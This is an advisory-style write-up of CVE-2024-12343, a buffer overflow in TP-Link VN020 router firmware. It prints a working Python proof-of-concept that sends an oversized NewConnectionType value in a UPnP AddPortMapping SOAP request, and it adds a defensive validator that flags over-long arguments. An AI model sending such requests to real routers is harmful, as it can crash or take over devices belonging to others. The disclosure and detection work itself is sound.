A critical vulnerability (CVE-2024-12343) has been discovered in the TP-Link VN020 F3v(T) TT_V6.2.1021 firmware. It is a buffer overflow in an unknown function of the /control/WANIPConnection file, located in the SOAP Request Handler component, and it is triggered by manipulating the NewConnectionType argument. Although the attack must be launched from within the local network, the exploit has already been publicly disclosed, making affected devices a possible target for attackers.
Code Snippet
The following code snippet demonstrates the manipulation of the NewConnectionType argument, which leads to the buffer overflow vulnerability:
import requests

# Placeholder: replace with the router's LAN address (the address in the original snippet was garbled)
TARGET_IP = "http://ROUTER_IP_PLACEHOLDER"
URL = f"{TARGET_IP}/control/WANIPConnection"

headers = {
    "Content-Type": "text/xml",
    "SOAPAction": "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping",
}

# The NewConnectionType argument is filled with 600 'A' characters; this oversized
# value is what triggers the overflow described above.
oversized_value = "A" * 600

payload = f'''<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<m:AddPortMapping xmlns:m="urn:schemas-upnp-org:service:WANIPConnection:1">
<NewRemoteHost></NewRemoteHost>
<NewExternalPort>808</NewExternalPort>
<NewProtocol>TCP</NewProtocol>
<NewInternalPort>80</NewInternalPort>
<NewInternalClient>INTERNAL_CLIENT_IP_PLACEHOLDER</NewInternalClient>
<NewEnabled>1</NewEnabled>
<NewPortMappingDescription>test</NewPortMappingDescription>
<NewLeaseDuration></NewLeaseDuration>
<NewConnectionType>{oversized_value}</NewConnectionType>
</m:AddPortMapping>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>'''

response = requests.post(URL, headers=headers, data=payload)
print(response.text)
Original References
1. CVE-2024-12343 - National Vulnerability Database
2. TP-Link VN020-F3v(T) TT_V6.2.1021 - 'NewConnectionType' Buffer Overflow - Exploit Database
Exploit Details
An attacker must be within the local network to exploit this vulnerability. By manipulating the 'NewConnectionType' argument, an attacker can cause a buffer overflow in the affected TP-Link device. This can lead to a Denial of Service (DoS) attack, making the router unresponsive, or could potentially result in the execution of arbitrary code on the router, granting an attacker full control of the device.
TP-Link is advised to release a firmware update that addresses this vulnerability and users are advised to update their devices' firmware as soon as the patch becomes available.
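The missing check is an argument-length bound in the SOAP handler. The following is an added example, not code from the advisory or from TP-Link: a defender-side validator that parses a WANIPConnection AddPortMapping body and flags any argument whose value exceeds a safe length. The per-argument limits, the helper names and the sample requests are assumptions constructed for the demonstration.

```python
import xml.etree.ElementTree as ET

SOAP_BODY = "{http://schemas.xmlsoap.org/soap/envelope/}Body"
WANIP_NS = "urn:schemas-upnp-org:service:WANIPConnection:1"

# Assumed upper bounds per argument (not values taken from the firmware).
# NewConnectionType is a short enumerated string in UPnP, so a long value is suspicious.
MAX_ARG_LEN = {
    "NewConnectionType": 32,
    "NewPortMappingDescription": 64,
    "NewInternalClient": 45,
    "NewRemoteHost": 253,
}
DEFAULT_MAX_LEN = 16


def check_add_port_mapping(soap_xml: str) -> list[str]:
    """Return a list of findings; an empty list means the request passes the size checks."""
    try:
        root = ET.fromstring(soap_xml)
    except ET.ParseError as exc:
        return [f"malformed XML: {exc}"]
    action = root.find(f"./{SOAP_BODY}/{{{WANIP_NS}}}AddPortMapping")
    if action is None:
        return ["no AddPortMapping action found"]
    findings = []
    for arg in action:
        name = arg.tag.split("}")[-1]  # strip any namespace prefix
        value = arg.text or ""
        limit = MAX_ARG_LEN.get(name, DEFAULT_MAX_LEN)
        if len(value) > limit:
            findings.append(f"{name}: {len(value)} chars exceeds limit {limit}")
    return findings


def build_request(connection_type: str) -> str:
    """Constructed sample AddPortMapping request used only for this demonstration."""
    return (
        '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
        "<SOAP-ENV:Body>"
        f'<m:AddPortMapping xmlns:m="{WANIP_NS}">'
        "<NewExternalPort>808</NewExternalPort><NewProtocol>TCP</NewProtocol>"
        f"<NewConnectionType>{connection_type}</NewConnectionType>"
        "</m:AddPortMapping></SOAP-ENV:Body></SOAP-ENV:Envelope>"
    )


if __name__ == "__main__":
    print(check_add_port_mapping(build_request("IP_Routed")))  # []
    print(check_add_port_mapping(build_request("A" * 600)))  # one finding for NewConnectionType
```

The same check can be run against captured LAN traffic to the UPnP control URL to spot overflow attempts before a firmware fix is available.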
Timeline
Published on: 12/08/2024 10:15:04 UTC
Last modified on: 12/10/2024 23:26:52 UTC